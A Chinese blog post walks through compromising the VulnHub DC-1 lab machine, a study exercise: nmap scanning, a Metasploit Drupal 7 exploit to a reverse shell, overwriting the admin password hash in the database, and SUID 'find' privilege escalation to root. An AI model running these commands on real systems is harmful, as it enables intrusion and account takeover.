<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    <meta name="description" content="Hexo Theme Redefine">
    <meta name="author" content="GTL-JU">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-redefine.png">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://evan.beee.top" crossorigin>
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/09/09/dc-1打靶记录/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="一、靶机搭建靶机下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;dc-1,292&#x2F;  下载得到是一个ova文件 我们这里直接使用kali导入就行  设置靶机名字和虚拟机存放位置 然后直接启动虚拟机就可以了  二、信息收集靶机发现因为目标靶机和我们的攻击机是在同一网段，我们这里直接扫描网段存活主机就行了 1nmap -sn 192.168.113.0&#x2F;24   通过存活主机扫描">
<meta property="og:type" content="article">
<meta property="og:title" content="DC-1打靶记录">
<meta property="og:url" content="http://example.com/2023/09/09/DC-1%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一、靶机搭建靶机下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;dc-1,292&#x2F;  下载得到是一个ova文件 我们这里直接使用kali导入就行  设置靶机名字和虚拟机存放位置 然后直接启动虚拟机就可以了  二、信息收集靶机发现因为目标靶机和我们的攻击机是在同一网段，我们这里直接扫描网段存活主机就行了 1nmap -sn 192.168.113.0&#x2F;24   通过存活主机扫描">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230908200000681.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909142915814.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909143322829.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909143555072.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909144813909.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230908202528547.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909155519077.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909155744088.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909155926867.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909160939336.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161031876.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161209344.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161311501.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161423066.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161622967.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161706448.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161914430.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162118874.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162337296.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162533641.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162734376.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909163008070.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909163130086.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909164443711.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909164733153.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165101345.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165214519.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165307393.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165341004.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165806415.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909170505396.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909170723993.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909170820781.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909171428691.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909171717246.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909172414215.png">
<meta property="article:published_time" content="2023-09-09T09:45:17.000Z">
<meta property="article:modified_time" content="2023-09-09T09:46:10.714Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透-靶机-DC系列">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230908200000681.png">
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/logo.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/logo.png">
    <!--- Page Info-->
    
    <title>
        
            DC-1打靶记录 -
        
        JU blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/assets/fonts.css">

    <!--- Font Part-->
    
    
    
        <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@400;500;700&display=swap" rel="stylesheet">
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.xml"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center"},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":true,"list":["php","java","比赛wp","环境搭建"]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":true,"family":"Noto Sans SC","url":"https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@400;500;700&display=swap"},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"pjax":true,"open_graph":true},"home_banner":{"enable":true,"image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"JU's blog","subtitle":{"text":[],"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"audios":[{"name":null,"artist":null,"url":null,"cover":null},{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.1.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Status":{"path":"https://status.evanluo.top/","icon":"fa-regular fa-chart-bar"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Github":"https://github.com/GTL-JU","Blog":"https://www.cnblogs.com/GTL-JU/","Friends":"/friends"}},"友链":{"icon":"fa-regular fa-link","path":"/links/"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","announcement":null,"links":{"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"},"Categories":{"path":"/categories","icon":"fa-regular fa-folder"}}},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}}};
    Global.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                JU blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        首页
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/archives"  >
                                    
                                        
                                            <i class="fa-regular fa-archive"></i>
                                        
                                        归档
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    target="_blank" rel="noopener" href="https://status.evanluo.top/"  >
                                    
                                        
                                            <i class="fa-regular fa-chart-bar"></i>
                                        
                                        状态
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown" 
                                    href="#" onClick="return false;">
                                    
                                        
                                            <i class="fa-regular fa-user"></i>
                                        
                                        关于&nbsp;<i class="fa-solid fa-chevron-down"></i>
                                    
                                </a>
                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                    
                                        <li>
                                        <a href="/about">ME
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a target="_blank" rel="noopener" href="https://github.com/GTL-JU">GITHUB
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a target="_blank" rel="noopener" href="https://www.cnblogs.com/GTL-JU/">BLOG
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a href="/friends">友情链接
                                        </a>
                                        </li>
                                    
                                    </ul>
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/links/"  >
                                    
                                        
                                            <i class="fa-regular fa-link"></i>
                                        
                                        友链
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i></div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                首页
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/archives"  >
                             
                                
                                    <i class="fa-regular fa-archive"></i>
                                
                                归档
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        target="_blank" rel="noopener" href="https://status.evanluo.top/"  >
                             
                                
                                    <i class="fa-regular fa-chart-bar"></i>
                                
                                状态
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="has-dropdown" 
                        href="#" onClick="return false;">
                            
                                
                                    <i class="fa-regular fa-user"></i>
                                
                                关于&nbsp;<i class="fa-solid fa-chevron-down"></i>
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                              
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" href="/about">ME</a>
                            </li>
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" target="_blank" rel="noopener" href="https://github.com/GTL-JU">GITHUB</a>
                            </li>
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" target="_blank" rel="noopener" href="https://www.cnblogs.com/GTL-JU/">BLOG</a>
                            </li>
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" href="/friends">友情链接</a>
                            </li>
                        
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/links/"  >
                             
                                
                                    <i class="fa-regular fa-link"></i>
                                
                                友链
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
            
                <div class="article-title">
                    <h1 class="article-title-regular">DC-1打靶记录</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/logo.png">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">GTL-JU</span>
                            
                                <span class="author-label">Lv2</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-09-09 17:45:17</span>
        <span class="mobile">2023-09-09 17:45</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-09-09 17:46:10</span>
            <span class="mobile">2023-09-09 17:46</span>
            <span class="hover-info">更新</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E6%B8%97%E9%80%8F-%E9%9D%B6%E6%9C%BA-DC%E7%B3%BB%E5%88%97/">渗透-靶机-DC系列</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>1.7k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>6 分钟</span>
        </span>
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <h1 id="一、靶机搭建"><a href="#一、靶机搭建" class="headerlink" title="一、靶机搭建"></a>一、靶机搭建</h1><p>靶机下载地址：<a class="link"   target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-1,292/" >https://www.vulnhub.com/entry/dc-1,292/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>下载得到是一个ova文件</p>
<p>我们这里直接使用kali导入就行</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230908200000681.png"
                      alt="image-20230908200000681"
                ></p>
<p>设置靶机名字和虚拟机存放位置</p>
<p>然后直接启动虚拟机就可以了</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909142915814.png"
                      alt="image-20230909142915814"
                ></p>
<h1 id="二、信息收集"><a href="#二、信息收集" class="headerlink" title="二、信息收集"></a>二、信息收集</h1><h2 id="靶机发现"><a href="#靶机发现" class="headerlink" title="靶机发现"></a>靶机发现</h2><p>因为目标靶机和我们的攻击机是在同一网段，我们这里直接扫描网段存活主机就行了</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sn 192.168.113.0/24</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909143322829.png"
                      alt="image-20230909143322829"
                ></p>
<p>通过存活主机扫描可以得到我们的目标靶机的ip地址为192.168.113.148</p>
<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><p>扫描目标靶机开放的端口</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A -T4 -O -p 0-65535 192.168.113.148</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909143555072.png"
                      alt="image-20230909143555072"
                ></p>
<p>可以看到开放了221端口和80端口</p>
<p>根据扫描结果我们可以看出开启了ssh服务和web服务</p>
<p>访问对应的web服务</p>
<h1 id="三、漏洞扫描与利用"><a href="#三、漏洞扫描与利用" class="headerlink" title="三、漏洞扫描与利用"></a>三、漏洞扫描与利用</h1><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909144813909.png"
                      alt="image-20230909144813909"
                ></p>
<p>主页面是一个登录页面</p>
<p>尝试管理员账号弱口令登录</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230908202528547.png"
                      alt="image-20230908202528547"
                ></p>
<p>没有爆出来密码</p>
<p>使用whatweb工具进行指纹识别</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whatweb -v 192.168.113.148</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909155519077.png"
                      alt="image-20230909155519077"
                ></p>
<p>指纹识别出来这是一个drupal 7的cms</p>
<p>这里使用msfconsole进行漏洞的搜索和利用</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909155744088.png"
                      alt="image-20230909155744088"
                ></p>
<p>漏洞检索</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search Drupal</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909155926867.png"
                      alt="image-20230909155926867"
                ></p>
<p>这里漏洞很多</p>
<p>但是测试只有编号为1的可以使用</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909160939336.png"
                      alt="image-20230909160939336"
                ></p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">options</span><br></pre></td></tr></table></figure></div>

<p>查看设置</p>
<p>配置目标靶机地址，和攻击机地址，也就是本机地址</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161031876.png"
                      alt="image-20230909161031876"
                ></p>
<p>设置完就可以输入exploit开始进行漏洞利用</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161209344.png"
                      alt="image-20230909161209344"
                ></p>
<p>利用成功</p>
<p>这里进行getshell</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; shell</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161311501.png"
                      alt="image-20230909161311501"
                ></p>
<p>可以看到一个flag1.txt</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161423066.png"
                      alt="image-20230909161423066"
                ></p>
<p>意思是让查看一下配置文件</p>
<p>网上可以搜索到durpal的配置文件的路径</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/sites/default</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161622967.png"
                      alt="image-20230909161622967"
                ></p>
<p>我们这里起的是一个反向shell</p>
<p>这里直接用python的 pty模块升级交互式shell</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161706448.png"
                      alt="image-20230909161706448"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909161914430.png"
                      alt="image-20230909161914430"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162118874.png"
                      alt="image-20230909162118874"
                ></p>
<p>flag2没有具体告诉我们flag3在哪里</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162337296.png"
                      alt="image-20230909162337296"
                ></p>
<p>但是我们可以找到</p>
<p>数据库的账号密码，登录进入数据库看看有没有敏感信息</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162533641.png"
                      alt="image-20230909162533641"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909162734376.png"
                      alt="image-20230909162734376"
                ></p>
<p>进入drupaldb数据库，查看表</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909163008070.png"
                      alt="image-20230909163008070"
                ></p>
<p>查看里面的数据</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909163130086.png"
                      alt="image-20230909163130086"
                ></p>
<p>在这里面我们可以找到</p>
<p>在这里面我们可以找到管理员的账号密码</p>
<p>但是密码是被加密了</p>
<p>看网上师傅的wp说是drupal存在加密脚本</p>
<p>我们可以用加密脚本加密一个我们自己设置的密码，然后把这个管理员密码替换掉</p>
<p>加密脚本文件路径在&#x2F;var&#x2F;www&#x2F;scripts&#x2F;password-hash.sh。</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php /var/www/scripts/password-hash.sh 123456789</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909164443711.png"
                      alt="image-20230909164443711"
                ></p>
<p>那我们后面就可以进行密码替换了</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">update users set pass = &quot;$S$D8yKKKzqsc2R.PZyfXmrY/R//m.mDetlFB3DU/D3srEPHqfCtyi/&quot; where name =&#x27;admin&#x27;;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909164733153.png"
                      alt="image-20230909164733153"
                ></p>
<p>然后我们这里已经成功把密码替换成我们自己设置的</p>
<p>然后我们直接去登录页面登录就行了</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165101345.png"
                      alt="image-20230909165101345"
                ></p>
<p>成功登录进来，而且我们也发现了flag3的位置</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165214519.png"
                      alt="image-20230909165214519"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165307393.png"
                      alt="image-20230909165307393"
                ></p>
<p>根据提示查看etc&#x2F;passwd</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165341004.png"
                      alt="image-20230909165341004"
                ></p>
<p>flag4在home目录下</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909165806415.png"
                      alt="image-20230909165806415"
                ></p>
<p>需要提权到root权限才可以</p>
<p>尝试suid提权</p>
<h1 id="四、提权"><a href="#四、提权" class="headerlink" title="四、提权"></a>四、提权</h1><p>查看所有有s标识为的命令</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909170505396.png"
                      alt="image-20230909170505396"
                ></p>
<p>有很多命令都有s标识位</p>
<p>这里尝试使用find提权</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909170723993.png"
                      alt="image-20230909170723993"
                ></p>
<p>尝试使用root执行命令</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find `which find` -exec whoami \;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909170820781.png"
                      alt="image-20230909170820781"
                ></p>
<p>提权</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find . -exec /bin/bash -p \;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909171428691.png"
                      alt="image-20230909171428691"
                ></p>
<p>可以看到提权成功</p>
<p>进入后面home查看flag4</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230909171717246.png"
                      alt="image-20230909171717246"
                ></p>
<h1 id="五、总结"><a href="#五、总结" class="headerlink" title="五、总结"></a>五、总结</h1><p>这台靶机主要是学习了一下漏洞扫描和里利用工具的使用</p>
